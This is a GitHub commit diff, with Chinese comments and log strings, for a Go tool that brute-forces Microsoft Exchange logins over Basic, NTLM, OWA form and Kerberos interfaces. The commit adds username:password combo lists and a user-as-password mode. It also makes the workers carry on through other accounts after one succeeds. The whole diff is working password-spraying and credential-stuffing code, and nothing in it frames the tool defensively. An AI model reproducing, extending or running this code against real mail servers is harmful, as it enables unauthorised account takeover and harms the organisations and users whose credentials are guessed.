feat: 增加多个字典参数

1. 增加 userpass 和 user-as-pass 参数 2. 优化代码逻辑
X1r0z · Aug 10, 2023 · fc95957 · fc95957
1 parent 86e9975
commit fc95957
Show file tree

Hide file tree

Showing 6 changed files with 128 additions and 95 deletions.
diff --git a/.gitignore b/.gitignore
@@ -4,4 +4,5 @@ EBurstGo
 user.txt
 pass.txt
 rockyou.txt
+userpass.txt
 dist/
diff --git a/lib/basicbrute.go b/lib/basicbrute.go
@@ -8,10 +8,10 @@ import (
 func BasicBruteWorker(info *TaskInfo) {
 
 	for data := range info.task {
-		if info.done.GetDone() {
-			break
-		}
 		username, password := data[0], data[1]
+		if info.done.Get(username) {
+			continue
+		}
 		Log.Debug("[*] 尝试: %v:%v", username, password)
 		req, _ := http.NewRequest("OPTIONS", info.u, nil)
 		req.SetBasicAuth(info.domain+"\\"+username, password)
@@ -22,7 +22,7 @@ func BasicBruteWorker(info *TaskInfo) {
 		}
 		if res.StatusCode != 401 && res.StatusCode != 408 && res.StatusCode != 504 {
 			Log.Success("[+] 成功: %v", username+":"+password)
-			info.done.SetDone()
+			info.done.Set(username)
 		} else {
 			Log.Failed("[-] 失败: %v", username+":"+password)
 		}

diff --git a/lib/httpbrute.go b/lib/httpbrute.go
@@ -18,10 +18,10 @@ func HttpBruteWorker(info *TaskInfo) {
 	referer, _ := url.JoinPath(info.targetUrl, "/owa/auth/logon.aspx?replaceCurrent=1&url="+refUrl)
 
 	for data := range info.task {
-		if info.done.GetDone() {
-			break
-		}
 		username, password := data[0], data[1]
+		if info.done.Get(username) {
+			continue
+		}
 		Log.Debug("[*] 尝试: %v:%v", username, password)
 		form := url.Values{
 			"destination":    {refUrl},
@@ -49,7 +49,7 @@ func HttpBruteWorker(info *TaskInfo) {
 			Log.Failed("[-] 失败: %v", username+":"+password)
 		} else if !strings.Contains(location, "reason") {
 			Log.Success("[+] 成功: %v", username+":"+password)
-			info.done.SetDone()
+			info.done.Set(username)
 		} else {
 			Log.Failed("[-] 失败: %v", username+":"+password)
 		}

diff --git a/lib/ntlmbrute.go b/lib/ntlmbrute.go
@@ -10,10 +10,10 @@ import (
 func NtlmBruteWorker(info *TaskInfo) {
 
 	for data := range info.task {
-		if info.done.GetDone() {
-			break
-		}
 		username, password := data[0], data[1]
+		if info.done.Get(username) {
+			continue
+		}
 		Log.Debug("[*] 尝试: %v:%v", username, password)
 
 		client := &http.Client{
@@ -37,7 +37,7 @@ func NtlmBruteWorker(info *TaskInfo) {
 		}
 		if res.StatusCode != 401 && res.StatusCode != 408 && res.StatusCode != 504 {
 			Log.Success("[+] 成功: %v", username+":"+password)
-			info.done.SetDone()
+			info.done.Set(username)
 		} else {
 			Log.Failed("[-] 失败: %v", username+":"+password)
 		}

diff --git a/lib/run.go b/lib/run.go
@@ -12,73 +12,70 @@ type TaskInfo struct {
 	u         string
 	domain    string
 	task      chan []string
-	done      *DoneFlag
+	done      *DoneMap
 	delay     int
 }
 
-type DoneFlag struct {
-	mu   sync.RWMutex
-	done bool
+type DoneMap struct {
+	mu      sync.RWMutex
+	done    map[string]struct{}
+	allDone bool
 }
 
-func (c *DoneFlag) GetDone() bool {
+func (c *DoneMap) Get(user string) bool {
 	c.mu.RLock()
 	defer c.mu.RUnlock()
-	return c.done
+	_, ok := c.done[user]
+	return ok
 }
 
-func (c *DoneFlag) SetDone() {
+func (c *DoneMap) Set(user string) {
 	c.mu.Lock()
 	defer c.mu.Unlock()
-	c.done = true
+	c.done[user] = struct{}{}
 }
 
 type BruteWorker func(info *TaskInfo)
 
-func BruteRunner(targetUrl string, mode string, domain string, userDict []string, passDict []string, n int, delay int, worker BruteWorker) {
+func BruteRunner(targetUrl string, mode string, domain string, dict [][]string, n int, delay int, worker BruteWorker) {
 
 	authPath := ExchangeUrls[mode]
 	u, _ := url.JoinPath(targetUrl, authPath)
 	Log.Info("[*] 使用 %v 接口爆破: %v", mode, targetUrl)
-	Log.Info("[*] 用户名:%v 密码:%v 共计:%v", len(userDict), len(passDict), len(userDict)*len(passDict))
 
 	t1 := time.Now()
 
-	for _, username := range userDict {
-
-		task := make(chan []string, len(passDict))
-		done := &DoneFlag{done: false}
-
-		info := &TaskInfo{
-			targetUrl: targetUrl,
-			mode:      mode,
-			u:         u,
-			domain:    domain,
-			task:      task,
-			done:      done,
-			delay:     delay,
-		}
-
-		for _, password := range passDict {
-			data := []string{username, password}
-			task <- data
-		}
+	task := make(chan []string, len(dict))
+	done := &DoneMap{done: make(map[string]struct{})}
+
+	info := &TaskInfo{
+		targetUrl: targetUrl,
+		mode:      mode,
+		u:         u,
+		domain:    domain,
+		task:      task,
+		done:      done,
+		delay:     delay,
+	}
 
-		close(task)
+	for _, data := range dict {
+		task <- data
+	}
 
-		var wg sync.WaitGroup
+	close(task)
 
-		for i := 0; i < n; i++ {
-			wg.Add(1)
-			go func() {
-				defer wg.Done()
-				worker(info)
-			}()
-		}
+	var wg sync.WaitGroup
 
-		wg.Wait()
+	for i := 0; i < n; i++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			worker(info)
+		}()
 	}
 
+	wg.Wait()
+
 	t2 := time.Now()
 	Log.Info("[*] 耗时: %v", t2.Sub(t1))
 }
diff --git a/main.go b/main.go
@@ -12,19 +12,21 @@ import (
 func main() {
 
 	var (
-		targetUrl string
-		mode      string
-		check     bool
-		domain    string
-		user      string
-		pass      string
-		userf     string
-		passf     string
-		n         int
-		v         bool
-		delay     int
-		debug     bool
-		nocolor   bool
+		targetUrl  string
+		mode       string
+		check      bool
+		domain     string
+		user       string
+		pass       string
+		userf      string
+		passf      string
+		userpassf  string
+		userAsPass bool
+		n          int
+		v          bool
+		delay      int
+		debug      bool
+		nocolor    bool
 	)
 	flag.StringVar(&targetUrl, "url", "", "Exchange 服务器地址")
 	flag.StringVar(&mode, "mode", "", "指定 Exchange Web 接口")
@@ -34,6 +36,8 @@ func main() {
 	flag.StringVar(&pass, "pass", "", "指定密码")
 	flag.StringVar(&userf, "userf", "", "用户名字典")
 	flag.StringVar(&passf, "passf", "", "密码字典")
+	flag.StringVar(&userpassf, "userpassf", "", "指定用户名密码字典 (user:pass)")
+	flag.BoolVar(&userAsPass, "user-as-pass", false, "指定密码与用户名相同")
 	flag.IntVar(&n, "thread", 2, "协程数量")
 	flag.IntVar(&delay, "delay", 0, "请求延时")
 	flag.BoolVar(&v, "verbose", false, "显示详细信息")
@@ -43,7 +47,7 @@ func main() {
 
 	if len(os.Args) == 1 {
 		flag.Usage()
-		os.Exit(0)
+		return
 	}
 
 	if nocolor {
@@ -52,40 +56,71 @@ func main() {
 
 	lib.Log = &lib.Logging{Verbose: v, IsDebug: debug}
 
-	if targetUrl == "" {
-		lib.Log.Failed("[-] Exchange 服务器地址为空")
-		os.Exit(0)
-	}
+	var dict [][]string
 
 	if check {
 		lib.Check(targetUrl)
 	} else {
-
-		var userDict []string
-		var passDict []string
-
-		if user != "" {
-			userDict = []string{user}
-		}
-
-		if pass != "" {
-			passDict = []string{pass}
-		}
-
-		if userf != "" {
-			fp, _ := os.Open(userf)
-			defer fp.Close()
-			b, _ := io.ReadAll(fp)
-			userDict = strings.Split(string(b), "\n")
-			userDict = userDict[:len(userDict)-1]
-		}
-
-		if passf != "" {
-			fp, _ := os.Open(passf)
+		if userpassf != "" {
+			fp, _ := os.Open(userpassf)
 			defer fp.Close()
 			b, _ := io.ReadAll(fp)
-			passDict = strings.Split(string(b), "\n")
-			passDict = passDict[:len(passDict)-1]
+			for _, v := range strings.Split(string(b), "\n") {
+				if v != "" {
+					u, p, _ := strings.Cut(v, ":")
+					dict = append(dict, []string{u, p})
+				}
+			}
+			lib.Log.Info("[*] 用户名:密码共计:%v", len(dict))
+		} else {
+			var userDict []string
+			var passDict []string
+
+			if user != "" {
+				userDict = []string{user}
+			}
+
+			if userf != "" {
+				fp, _ := os.Open(userf)
+				defer fp.Close()
+				b, _ := io.ReadAll(fp)
+				for _, v := range strings.Split(string(b), "\n") {
+					if v != "" {
+						userDict = append(userDict, v)
+					}
+				}
+			}
+
+			if pass != "" {
+				passDict = []string{pass}
+			}
+
+			if passf != "" {
+				fp, _ := os.Open(passf)
+				defer fp.Close()
+				b, _ := io.ReadAll(fp)
+				for _, v := range strings.Split(string(b), "\n") {
+					if v != "" {
+						passDict = append(passDict, v)
+					}
+				}
+			}
+
+			for _, u := range userDict {
+				if userAsPass {
+					dict = append(dict, []string{u, u})
+				} else {
+					for _, p := range passDict {
+						dict = append(dict, []string{u, p})
+					}
+				}
+			}
+
+			if userAsPass {
+				lib.Log.Info("[*] 用户名:%v 密码:%v 共计:%v", len(userDict), len(userDict), len(dict))
+			} else {
+				lib.Log.Info("[*] 用户名:%v 密码:%v 共计:%v", len(userDict), len(passDict), len(dict))
+			}
 		}
 
 		var worker lib.BruteWorker
@@ -101,9 +136,9 @@ func main() {
 			worker = lib.KerberosBruteWorker
 		default:
 			lib.Log.Failed("[-] Exchange 接口无效")
-			os.Exit(0)
+			return
 		}
 
-		lib.BruteRunner(targetUrl, mode, domain, userDict, passDict, n, delay, worker)
+		lib.BruteRunner(targetUrl, mode, domain, dict, n, delay, worker)
 	}
 }